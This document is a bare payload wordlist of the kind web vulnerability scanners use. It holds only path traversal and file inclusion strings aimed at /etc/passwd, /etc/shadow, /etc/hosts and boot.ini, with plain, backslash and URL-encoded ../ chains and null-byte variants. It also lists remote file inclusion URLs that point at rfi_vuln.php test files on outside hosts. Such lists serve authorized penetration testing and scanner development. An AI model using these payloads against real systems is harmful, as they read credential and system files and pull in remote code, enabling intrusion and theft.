/etc/passwd
/etc/passwd%00
/etc/shadow
/etc/shadow%00
/etc/hosts
/etc/hosts%00
/boot.ini
/boot.ini%00
C:\boot.ini
C:\boot.ini%00
https://crowdshield.com/.testing/rfi_vuln.php
https://crowdshield.com/.testing/rfi_vuln.php%00
//xerosecurity.com/.testing/rfi_vuln.php
//xerosecurity.com/.testing/rfi_vuln.php%00
http://xerosecurity.com/.testing/rfi_vuln.php
http://xerosecurity.com/.testing/rfi_vuln.php%00
/../../../../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../../../../../../../../../etc/hosts
/../../../../../../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../../../../../etc/shadow%00
/../../../../../../../../../../../../../../../../../../etc/hosts%00
/../../../../../../../../../../../../../../../../../../boot.ini
/../../../../../../../../../../../../../../../../../../boot.ini%00
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\hosts
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\hosts%00
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts%00
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
/..........................................................................\..\..\..\..\..\..\..\boot.ini
/..........................................................................\..\..\..\..\..\..\..\etc/passwd
/..........................................................................\..\..\..\..\..\..\..\boot.ini%00
/..........................................................................\..\..\..\..\..\..\..\etc/passwd%00
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd%00
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/shadow
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/shadow%00
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/hosts
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/hosts%00
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/shadow
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/hosts
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd%00
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/shadow%00
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/hosts%00
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini%00
/
/../
/../../
/../../../
/../../../../
/../../../../../
/../../../../../../
/../../../../../../../
/../../../../../../../../
/../../../../../../../../../
/../../../../../../../../../../
/../../../../../../../../../../../
/../../../../../../../../../../../../
/../../../../../../../../../../../../../
\
\..\
\..\..\
\..\..\..\
\..\..\..\..\
\..\..\..\..\..\
\..\..\..\..\..\..\
\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\..\..\..\
